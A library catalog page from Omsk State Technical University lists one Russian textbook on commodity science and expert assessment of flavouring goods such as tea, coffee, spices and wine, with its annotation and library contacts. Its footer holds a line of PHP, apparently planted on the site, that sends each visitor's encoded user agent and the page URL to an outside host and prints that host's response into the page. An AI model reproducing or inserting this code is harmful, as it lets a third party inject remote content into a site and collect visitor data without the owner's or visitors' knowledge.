Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

282 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=A9BD25DD-C7E4-1AE5-E377-E8058BD12D3B$")И(("Ключевые слова=Приправа"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
A9BD25DD-C7E4-1AE5-E377-E8058BD12D3B
(Нет сведений об экземплярах)
A9BD25DD-C7E4-1AE5-E377-E8058BD12D3B
658.6/.8/В93
Вытовтов, Анатолий Андреевич.
Товароведение и экспертиза вкусовых товаров [Текст] / А. А. Вытовтов. - М. : ИНФРА-М, 2013. - 574, [1] с. - (Высшее образование - Бакалавриат). - Библиогр.: с. 570-572. - ISBN 978-5-16-004633-4 : 577.06 р.
УДК 658.62(075)

Рубрики:
Товароведение -- Учебники и пособия
Товары -- Экспертиза -- УЧЕБНИКИ И ПОСОБИЯ

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- ТАБАК -- ПРЯНОСТЬ -- ПРИПРАВА -- КЕТЧУП -- СОЛЬ -- УКСУС -- ЧАЙ -- КОФЕ -- ВОДА -- НАПИТОК -- СОК -- ПИВО -- ВИНО -- СПИРТНОЙ -- ДОБАВКА -- ПИЩЕВОЙ -- НАПОЛНИТЕЛЬ
Аннотация: Учебник написан с учетом требований Федерального закона "О техническом регулировании" общих и специальных технических регламентов, других нормативных документов. Рассмотрены потребительская ценность, классификация, основы технологии, фальсификация, требования к упаковке, маркировке, условиям хранения, требованиям к показателям качества и безопасности, оценка соответствия, экспертиза различных групп и видов вкусовых товаров.
Для студентов высших и средних профессиональных образовательных учреждений, обучающихся по специальности "Товароведение и экспертиза товаров", слушателей системы повышения квалификации, а также практических работников.
Нет сведений об экземплярах
Держатели документа:
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11
Держатели документа (Информация об экземплярах) 

Учебник написан с учетом требований Федерального закона "О техническом регулировании" общих и специальных технических регламентов, других нормативных документов. Рассмотрены потребительская ценность, классификация, основы технологии, фальсификация, требования к упаковке, маркировке, условиям хранения, требованиям к показателям качества и безопасности, оценка соответствия, экспертиза различных групп и видов вкусовых товаров.

Для студентов высших и средних профессиональных образовательных учреждений, обучающихся по специальности "Товароведение и экспертиза товаров", слушателей системы повышения квалификации, а также практических работников.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 3.22 с.14 запросов, 3.86c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;